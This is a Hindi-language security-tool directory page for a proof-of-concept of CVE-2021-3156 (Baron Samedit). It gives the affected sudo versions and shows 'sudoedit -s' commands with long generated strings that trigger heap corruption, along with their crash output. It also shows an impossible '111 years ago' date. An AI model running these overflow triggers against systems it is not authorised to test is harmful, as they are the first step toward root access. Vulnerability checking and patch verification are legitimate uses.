Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Baron-Samedit-Heap-Buffer-Overflow-CVE-2021-3156 — CVE-2021-3156 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, sudo में एक हीप-आधारित बफर ओवरफ्लो जो sudoedit -s के साथ तैयार कमांड-लाइन तर्क के माध्यम से रूट के लिए स्थानीय विशेषाधिकार वृद्धि की अनुमति देता है। | Kitploit
उपकरण/GitHubGitHub/shuhaib88/baron-samedit-heap-buffer-overflow-cve-2021-3156
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगबाइनरी शोषण
GitHubshuhaib88/baron-samedit-heap-buffer-overflow-cve-2021-3156

Baron-Samedit-Heap-Buffer-Overflow-CVE-2021-3156

CVE-2021-3156 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, sudo में एक हीप-आधारित बफर ओवरफ्लो जो sudoedit -s के साथ तैयार कमांड-लाइन तर्क के माध्यम से रूट के लिए स्थानीय विशेषाधिकार वृद्धि की अनुमति देता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
111 साल पहलेअभी तक समीक्षित नहीं

Baron-Samedit-Heap-Buffer-Overflow-CVE-2021-3156


शोषण के लिए संवेदनशील संस्करण

बैरन सेमेडिट भेद्यता (CVE-2021-3156) sudo के लीगेसी संस्करण 1.8.2 से 1.8.31p2 और स्थिर संस्करण 1.9.0 से 1.9.5p1 को प्रभावित करती है। यह हीप-आधारित बफर ओवरफ्लो दोष जुलाई 2011 में कमिट 8255ed69 के माध्यम से पेश किया गया था और लगभग एक दशक तक अज्ञात रहा।

Sudo 1.9.5p2 से पहले के संस्करण में एक ऑफ-बाय-वन त्रुटि है जो हीप-आधारित बफर ओवरफ्लो का कारण बन सकती है, जो "sudoedit -s" और एक कमांड-लाइन आर्गुमेंट के माध्यम से रूट तक विशेषाधिकार वृद्धि की अनुमति देती है जो एक एकल बैकस्लैश वर्ण के साथ समाप्त होता है।

पायथन कमांड से भेद्यता की जाँच करना

root@kitploit:~
sudoedit -s '\' $(python3 -c 'print("A"*1000)')
root@kitploit:~
malloc(): invalid size (unsorted)
Aborted

पायथन कमांड से भेद्यता की जाँच करना

root@kitploit:~
sudoedit -s '\' `perl -e 'print "A" x 65536'`
root@kitploit:~
malloc(): corrupted top size
Aborted (core dumped)

उबंटू 20.04 में उपयोग और परिणाम

root@kitploit:~
shuhaib@somebox:~$ sudo --version
Sudo version 1.8.31
Sudoers policy plugin version 1.8.31
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.31

shuhaib@somebox:~$ sudoedit -s '\' $(python3 -c 'print("A"*1000)')
malloc(): invalid size (unsorted)
Aborted (core dumped)

shuhaib@somebox:~$ sudoedit -s '\' `perl -e 'print "A" x 65536'`
malloc(): corrupted top size
Aborted (core dumped)
टूल डाउनलोड करें